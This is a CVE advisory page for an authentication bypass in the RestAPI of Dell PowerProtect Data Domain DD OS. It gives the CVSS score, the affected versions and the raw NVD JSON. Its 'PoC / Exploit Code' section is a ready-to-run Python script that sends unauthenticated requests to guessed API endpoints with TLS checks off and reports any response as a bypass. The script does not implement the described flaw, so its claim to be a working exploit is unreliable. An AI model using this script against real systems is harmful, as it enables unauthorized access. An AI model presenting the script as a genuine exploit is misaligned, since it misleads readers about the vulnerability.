Security Vulnerability Report
中文
CVE-2025-43727 CVSS 7.5 HIGH

CVE-2025-43727

Published: 2025-10-07 20:15:35
Last Modified: 2025-10-14 20:16:51
Source: [email protected]

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an incorrect Implementation of Authentication Algorithm vulnerability in the RestAPI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 ~ 8.1.0.10
Dell PowerProtect Data Domain DD OS LTS2024 Release 7.13.1.0 ~ 7.13.1.25
Dell PowerProtect Data Domain DD OS LTS 2023 Release 7.10.1.0 ~ 7.10.1.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-43727 - Dell PowerProtect Data Domain RestAPI Authentication Bypass PoC # This PoC demonstrates exploitation of incorrect authentication algorithm implementation # in Dell PowerProtect Data Domain DD OS RestAPI component. import requests import sys import urllib3 # Disable SSL warnings for self-signed certificates urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "https://192.168.1.100" REST_API_PORT = 443 def exploit_cve_2025_43727(host): """ Exploit the authentication algorithm implementation flaw in DD OS RestAPI. The vulnerability allows unauthenticated remote access by bypassing the broken authentication algorithm. """ base_url = f"{host}:{REST_API_PORT}" # Step 1: Attempt to access RestAPI without authentication # The authentication bypass allows access without valid credentials headers = { "User-Agent": "Mozilla/5.0", "Accept": "application/json", "X-Requested-With": "XMLHttpRequest" } # Step 2: Probe RestAPI endpoints endpoints = [ "/api/v1/dd-systems", "/api/v1/auth", "/rest/v1.0/system", "/api/v1/system/info", ] print(f"[*] Targeting: {base_url}") print(f"[*] CVE-2025-43727 - Dell DD OS RestAPI Auth Bypass") for endpoint in endpoints: url = f"{base_url}{endpoint}" try: # Attempt unauthenticated access exploiting the auth algorithm flaw response = requests.get( url, headers=headers, verify=False, timeout=10 ) if response.status_code == 200: print(f"[+] SUCCESS - Unauthenticated access to {endpoint}") print(f"[+] Response: {response.text[:500]}") return True elif response.status_code == 401: print(f"[-] {endpoint} - Authentication required (not vulnerable)") else: print(f"[?] {endpoint} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to {endpoint}: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-43727 PoC - Dell PowerProtect Data Domain") print("RestAPI Authentication Algorithm Bypass") print("CVSS 3.1: 7.5 (HIGH)") print("=" * 60) exploit_cve_2025_43727(TARGET_HOST)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43727", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:34.513", "lastModified": "2025-10-14T20:16:50.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an incorrect Implementation of Authentication Algorithm vulnerability in the RestAPI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-303"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.60", "matchCriteriaId": "F2389C08-162A-4D43-B1EA-D93D7DB51781"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.30", "matchCriteriaId": "5E7EC11C-C065-48D9-A036-5A17653D44EA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndExcluding": "8.3.0.10", "matchCriteriaId": "FD518568-542A-420D-B0E6-6F35E127E5CE"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000348708/dsa-2025-159-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.